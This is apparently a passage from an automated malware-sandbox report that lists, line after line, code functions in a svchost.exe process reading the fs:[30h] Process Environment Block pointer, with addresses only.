Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]	2_2_0342A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]	2_2_0342C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]	2_2_034C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]	2_2_034B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0342A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]	2_2_034380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]	2_2_034B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0342C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]	2_2_034720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]	2_2_0343208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034280A0 mov eax, dword ptr fs:[00000030h]	2_2_034280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]	2_2_034C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]	2_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_034F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]	2_2_0346674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]	2_2_03430750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]	2_2_034BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]	2_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]	2_2_03472750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]	2_2_034B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]	2_2_03438770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]	2_2_0346C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]	2_2_03430710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]	2_2_03460710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]	2_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]	2_2_0346C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]	2_2_0346273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]	2_2_034AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]	2_2_034B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]	2_2_034527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_034BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]	2_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]	2_2_034347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]	2_2_034D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]	2_2_034307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]	2_2_034E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]	2_2_0344C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]	2_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]	2_2_034F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]	2_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]	2_2_0346A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]	2_2_03462674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]	2_2_034AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]	2_2_0344260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]	2_2_03472619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]	2_2_0344E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]	2_2_03466620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]	2_2_03468620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]	2_2_0343262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0346A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_034AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]	2_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]	2_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]	2_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]	2_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0346C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]	2_2_034666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]	2_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]	2_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]	2_2_034C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]	2_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]	2_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]	2_2_034365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]	2_2_034325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]	2_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]	2_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]	2_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]	2_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]	2_2_03464588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]	2_2_0346E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]	2_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]	2_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]	2_2_034EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]	2_2_0342645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]	2_2_0345245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]	2_2_034BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]	2_2_0342C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]	2_2_0346A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]	2_2_034304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]	2_2_034EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]	2_2_034364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]	2_2_034644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_034BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]	2_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]	2_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]	2_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]	2_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]	2_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]	2_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]	2_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]	2_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]	2_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]	2_2_034D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428B50 mov eax, dword ptr fs:[00000030h]	2_2_03428B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]	2_2_034DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]	2_2_0342CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504B00 mov eax, dword ptr fs:[00000030h]	2_2_03504B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]	2_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]	2_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]	2_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]	2_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_034DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]	2_2_0345EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_034BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]	2_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]	2_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
